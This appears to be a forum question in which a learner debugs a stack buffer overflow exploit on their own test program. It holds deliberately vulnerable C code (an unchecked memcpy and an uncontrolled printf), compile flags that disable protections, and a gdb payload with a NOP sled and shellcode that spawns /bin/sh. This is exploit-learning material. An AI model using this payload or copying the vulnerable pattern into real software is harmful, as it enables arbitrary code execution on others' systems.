# unable to execute shellcode,which is place on stack

Tags: linux, buffer-overflow, shellcode, debugging

I am trying to execute the shellcode to spawn an "sh" shell.
I have taken shellcode as command line arguement,copied it to stack and tried to overwrite the return address of main function with the starting address of shellcode placed in stack.
Everything goes fine but when the program executes "ret" statement,mysteriously the control jumps to other location rather than starting address of shellcode
and shellcode doesnot execute

Here is my code ,compilation and "gdb" details

```
#include<stdio.h>
int main(int argc, char *argv[])
{
char buf[256];
memcpy(buf, argv[1],strlen(argv[1]));
printf(buf);
}
```

compilation:
gcc -fno-stack-protector -z execstack -mpreferred-stack-boundary=2 -o shellcode shellcode.c -w

gdb Details:::r `python -c 'print "A"*232+"\x31\xc0\x50\x68\x2f\x2f\x73\x68x0b\xcd\x80\x31\xc0\x40\xcd\x80"+"\xe8\xf3\xff\xbf"'`

In gdb,I see that gcc is allocating 268 bytes of space for local use inside main function.

output details::::
(gdb) r `python -c 'print "\x90"*232+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"+"\xe8\xf3\xff\xbf"'`
(gdb) r `python -c 'print "\x90"*232+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"+"\xe8\xf3\xff\xbf"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/HIIII/bflw_pres/shellcode `python -c 'print "\x90"*232+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"+"\xe8\xf3\xff\xbf"'`

Breakpoint 1, 0x080484af in main ()
(gdb) x/70xw $esp
0xbffff3dc: 0xbffff3e8  0xbffff6f3  0x00000108  0x00000001
0xbffff3ec: 0x000008d3  0xb7fdcb48  0xb7fdc858  0x0804826b
0xbffff3fc: 0xb7e1b438  0x0804821c  0x00000001  0x00000000
0xbffff40c: 0x00000000  0x00000000  0xb7fff000  0xbffff524
0xbffff41c: 0xb7fffaf0  0xbffff4e0  0xb7fe77aa  0xbffff490
0xbffff42c: 0x0804821c  0xbffff498  0xb7fffa94  0x00000000
0xbffff43c: 0xb7fdcb48  0x00000001  0x00000000  0x00000001
0xbffff44c: 0xb7fff938  0x00000000  0x00000000  0x00000000
0xbffff45c: 0x00000000  0x00000003  0x00000009  0x02c0003f
0xbffff46c: 0x00000000  0xbffff524  0xbffff498  0xbffff490
0xbffff47c: 0x0804826b  0xb7fff938  0x00000000  0x000000c2
0xbffff48c: 0xb7ea3d56  0xffffffff  0xbffff4be  0xb7e1abf8
0xbffff49c: 0xb7e41493  0x00000000  0x00ca0000  0x00000001
0xbffff4ac: 0x080482fd  0xbffff6d3  0x0000002f  0x0804a000
0xbffff4bc: 0x08048522  0x00000002  0xbffff584  0xbffff590
0xbffff4cc: 0xb7e4164d  0xb7fb93c4  0xb7fff000  0x080484db
0xbffff4dc: 0xb7fb9000  0x080484d0  0x00000000  0x00000000
0xbffff4ec: **0xb7e27a83**  0x00000002

(gdb) c

Continuing.

Breakpoint 2, 0x080484b4 in main ()
(gdb) x/70xw $esp
0xbffff3dc: 0xbffff3e8  0xbffff6f3  0x00000108  **0x90909090**
**0xbffff3ec:   0x90909090  0x90909090  0x90909090  0x90909090
0xbffff3fc: 0x90909090  0x90909090  0x90909090  0x90909090
0xbffff40c: 0x90909090  0x90909090  0x90909090  0x90909090
0xbffff41c: 0x90909090  0x90909090  0x90909090  0x90909090
0xbffff42c: 0x90909090  0x90909090  0x90909090  0x90909090
0xbffff43c: 0x90909090  0x90909090  0x90909090  0x90909090
0xbffff44c: 0x90909090  0x90909090  0x90909090  0x90909090
0xbffff45c: 0x90909090  0x90909090  0x90909090  0x90909090
0xbffff46c: 0x90909090  0x90909090  0x90909090  0x90909090
0xbffff47c: 0x90909090  0x90909090  0x90909090  0x90909090
0xbffff48c: 0x90909090  0x90909090  0x90909090  0x90909090
0xbffff49c: 0x90909090  0x90909090  0x90909090  0x90909090
0xbffff4ac: 0x90909090  0x90909090  0x90909090  0x90909090
0xbffff4bc: 0x90909090  0x90909090  0x90909090  0x90909090**
0xbffff4cc: **0x90909090**  *0x6850c031 0x68732f2f  0x69622f68
0xbffff4dc: 0x89e3896e  0xb0c289c1  0x3180cd0b  0x80cd40c0*
0xbffff4ec: **0xbffff3e8**  0x00000002

(gdb) c

Continuing.

Program received signal SIGSEGV, Segmentation fault.
0xbffff4e5 in ?? ()

(gdb)

Pls..help

Comment: @raz,@Xander,@Jens,@Erat,@Bob Brown,@M'vy thnx for pointing,i executed the code,followed exactly same procedure in that post,however got the same problem as it was in my code,at end of this post are links for my output of code in gdb,Pls. look into the same and suggest me how to resolve it,the code taken from "Exploiting buffer overflow leads to segfault" post.                                            http://postimg.org/image/jp4v9ru0l/                                            http://postimg.org/image/k673yr3vz/

Comment: Hello everyone i found this video( https://vimeo.com/76380273) very helpful,solved my problem